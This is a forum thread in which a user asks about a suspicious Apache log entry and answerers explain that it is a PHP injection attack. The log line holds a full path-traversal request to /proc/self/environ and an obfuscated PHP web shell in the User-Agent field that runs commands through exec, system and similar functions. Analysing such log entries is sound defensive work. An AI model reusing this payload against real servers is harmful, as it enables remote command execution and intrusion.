Want to win a PS4? Go Premium and enter to win our High-Tech Treats giveaway. Enter to Win

x
?
Solved

Apache Log Files

Posted on 2010-11-18
3
Medium Priority
?
384 Views
Last Modified: 2012-05-10
Can anyone tell what this is doing??

./access.log.3:200.234.200.150 - - [28/Sep/2008:04:30:40 +0800] "GET /conference_proceedings/2005/forensics/includes/db_connect.php?baseDir=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 501 266 "-" "<? $x0e=\"\\145x\\x65\\x63\"; $x0f=\"\\x66eo\\146\"; $x10=\"\\x66\\x72ea\\x64\"; $x11=\"\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\"; $x12=\"i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\"; $x13=\"\\152\\157\\x69\\156\"; $x14=\"o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\"; $x15=\"ob\\137\\x65\\156d\\137\\x63lea\\156\"; $x16=\"\\x6fb_st\\x61\\x72\\164\"; $x17=\"\\x70\\141\\163s\\164\\x68\\162\\165\"; $x18=\"\\x70\\143\\154ose\"; $x19=\"p\\157\\160e\\x6e\"; $x1a=\"\\163h\\145\\154l\\137\\x65\\170e\\143\"; $x1b=\"\\x73\\x79s\\x74e\\x6d\"; function x0b($x0b){ global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;  $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13(\"\\n\",$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b,\"\\x72\"))){ $x0c = \"\"; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} } return $x0c;}echo x0b(\"ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\");?>"
0
Comment
Question by:madstylex
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
3 Comments
 
LVL 26

Accepted Solution

by:
arober11 earned 750 total points
ID: 34168936
Hi, appears someone is attempting to hack your web server, via a php injection attack, the following will give you some more details:

http://packetstormsecurity.org/files/view/80068/shell-lfi.txt

0
 
LVL 7

Assisted Solution

by:mchkorg
mchkorg earned 750 total points
ID: 34171986
Hi,
it might be a robot trying some known security holes randomly

Is this URL familiar to you? /conference_proceedings/2005/forensics.....
If yes, be sure the corresponding software is up to date.
If not, you don't care, it's trying old security holes I guess (2005)

*and*, you might want to block this IP 200.234.200.150 in your firewall if it bothers you too much

It seems to come from an infected computer in brazil, you might contact their "abuse" email contact abuse@locaweb.com.br
The IP points to hm1099.locaweb.com.br

regards
0
 

Author Closing Comment

by:madstylex
ID: 34414644
not fully complete answer
0

Featured Post

Windows Server 2016: All you need to know

Learn about Hyper-V features that increase functionality and usability of Microsoft Windows Server 2016. Also, throughout this eBook, you’ll find some basic PowerShell examples that will help you leverage the scripts in your environments!

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

If you are running a LAMP infrastructure, this little code snippet is very helpful if you are serving lots of HTML, JavaScript and CSS-related information. The mod_deflate module, which is part of the Apache 2.2 application, provides the DEFLATE…
In Solr 4.0 it is possible to atomically (or partially) update individual fields in a document. This article will show the operations possible for atomic updating as well as setting up your Solr instance to be able to perform the actions. One major …
How to fix incompatible JVM issue while installing Eclipse While installing Eclipse in windows, got one error like above and unable to proceed with the installation. This video describes how to successfully install Eclipse. How to solve incompa…
We’ve all felt that sense of false security before—locking down external access to a database or component and feeling like we’ve done all we need to do to secure company data. But that feeling is fleeting. Attacks these days can happen in many w…
Suggested Courses
Course of the Month11 days, 2 hours left to enroll

618 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question